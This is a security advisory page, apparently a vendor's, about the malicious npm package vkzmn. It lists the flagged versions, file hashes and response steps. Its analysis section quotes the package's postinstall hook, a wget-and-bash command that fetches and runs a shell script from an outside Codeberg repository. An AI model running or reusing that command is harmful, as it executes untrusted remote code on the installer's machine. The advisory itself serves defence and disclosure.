Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

vkzmnnpm

vkzmn is a confirmed malicious npm package (MAL-2026-6594) that executes malicious code on install (malicious versions 1.0.0, 1.0.1, 1.0.2…). Do not install it — remove it immediately and rotate any exposed credentials.

Malicious code in vkzmn (npm)

MAL-2026-6594
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall vkzmn

What this malware does

package.json declares a postinstall lifecycle hook that runs wget https://codeberg.org/atilalogical/worm_teste/raw/branch/main/down_procwork.sh -O d.sh; bash d.sh, downloading a shell script from a mutable branch of an unrelated personal Codeberg repository named worm_teste and executing it via bash on the installer's machine at npm install time. The fetched script is unpinned (mutable main branch), unverified (no hash/signature check), and from a destination that bears no relationship to any declared package purpose — the source repository name itself indicates worm/propagation testing. Whatever bytes the repository owner serves at fetch time execute with the privileges of the user running npm install. The package additionally declares a self-referential dependency (vkzmn: ^1.0.4), consistent with propagation scaffolding rather than a legitimate library.

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Malicious versions

9 flagged
1.0.01.0.11.0.21.0.31.0.41.0.51.0.61.0.71.0.8

Indicators of compromise (SHA-256)

a41dc023cd84c69935ac2c642d6cb9c187fb6bce9c18d226d785fba49e80e50a
af074062a138c9e2bd27eca2a2de361f5858b524572027b0c7b9d259e6159abc
275a66a3aaf7fab2dfb0c863d365fbfa0ca04ef0f86e73c29f4b80e4ac13d80c
de32f968e5baf0cafd4dec2150a8277d8ca804738d67b70ef3278786a1722825
fd8a0a5039c14be775f5d6cf1cdeaf97cfc67c8bd19d225b3169a19e8f6076cd
24a611f2b3bbde011daec9f0a8074210ed06bfcf7a056cb0b9a13929f5e52caa
506973a320a502d1aea56df6bd5426cbe5476bc31073dc6f6e55d6e14cb0c822
bcbb09bd76520fd0c1d45ce077fb366bdaaf72da01e684d6a3c8652039f5b755
dc2e10775ac70e6f3b083ac0a76374e09e11cac7b06068a4bd3b6114f796a0df
f9079fc264db21b87d14112bf78165da4c029f70461a3433d39eb50bda1e808d

Detection & response playbook

Malicious package
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for vkzmn (9 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging vkzmn across your stack and pipelines.

  2. If you installed it — respond

    Remove vkzmn from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.

  3. Did it already run?

    If vkzmn was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks vkzmn before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. vkzmn on npm has been identified as a malicious package (versions 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, and 1 more flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

GHSA-96mc-pfwc-4h47IN-MAL-2026-008598IN-MAL-2026-008907IN-MAL-2026-008908IN-MAL-2026-008909IN-MAL-2026-008915IN-MAL-2026-009210IN-MAL-2026-009209IN-MAL-2026-009207IN-MAL-2026-009208

References

Credits

  • Amazon Inspector · finder

Detect & block this

O3 blocks vkzmn-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.

Explore

vkzmn (npm) malicious package — MAL-2026-6594 | O3 Security